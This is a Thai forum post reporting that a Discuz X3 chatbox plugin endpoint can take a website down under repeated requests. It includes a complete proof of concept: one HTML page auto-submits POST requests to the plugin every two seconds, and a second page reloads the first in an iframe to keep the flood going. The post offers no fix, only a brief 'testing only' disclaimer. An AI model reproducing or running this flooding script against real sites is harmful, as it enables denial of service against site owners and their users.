GRAND FORCE Project Community: พบช่องโหว่ของ Plugin ของ Discuz X3

พบช่องโหว่ของ Plugin บางตัวของ Discuz X3 ซึ่งเมื่อมีการเรียกใช้มากก็ล่มทั้งเว็บเลย

โดย Server ของเว็บที่พบเป็น Linux + Apache web server ไม่ทราบ version

Plugin น่าจะเป็นส่วนของ chatbox รุ่นยอดนิยมไม่ทราบ version

ทดสอบได้โดยการสร้างไฟล์เว็บเพจ 2 ไฟล์ที่เครื่องตัวเอง

A.html

<form name="myForm" 
action="http:// <ชื่อโฮสต์หรือโดเมน> / <directory ของ Discuz> /plugin.php?id=th_chat:newinit" 
method="post">
<input name="test" type="text" value="test">
<input name="command" type="text" value="test">
<input type="submit">
</form>

<script type="text/javascript">
    window.onload=function(){
        var auto = setTimeout(function(){ autoRefresh(); }, 1000);

        function submitform(){
          document.forms["myForm"].submit();
        }

        function autoRefresh(){
           clearTimeout(auto);
           auto = setTimeout(function(){ submitform(); autoRefresh(); }, 2000);
        }
    }
</script>

B.html

<meta http-equiv="refresh" content="5">
<iframe src="A.html"></iframe>

ยังไม่ได้ใช้ทดสอบตามเว็บชาวบ้านนะครับ และตอนที่เอามาลองกับเว็บ GF

พบว่าไม่เกิดผลอะไร แต่สำหรับเว็บที่ไปเช่า Hosting ราคาถูกๆก็ไม่แน่

ปล. สำหรับใช้ทดสอบเว็บ และ Server เท่านั้นนะครับ

อย่าเอาไปใช้แกล้งชาวบ้าน

ทางแก้!?

ไม่ทราบครับ ไปถามคนสร้าง Discuz หรือ plugin เอาเอง

คำแนะนำ

เขียนโค้ดเอง แล้วเว็บของคุณก็จะไม่มีช่องโหว่ร่วมกับชาวบ้านครับ

Loading...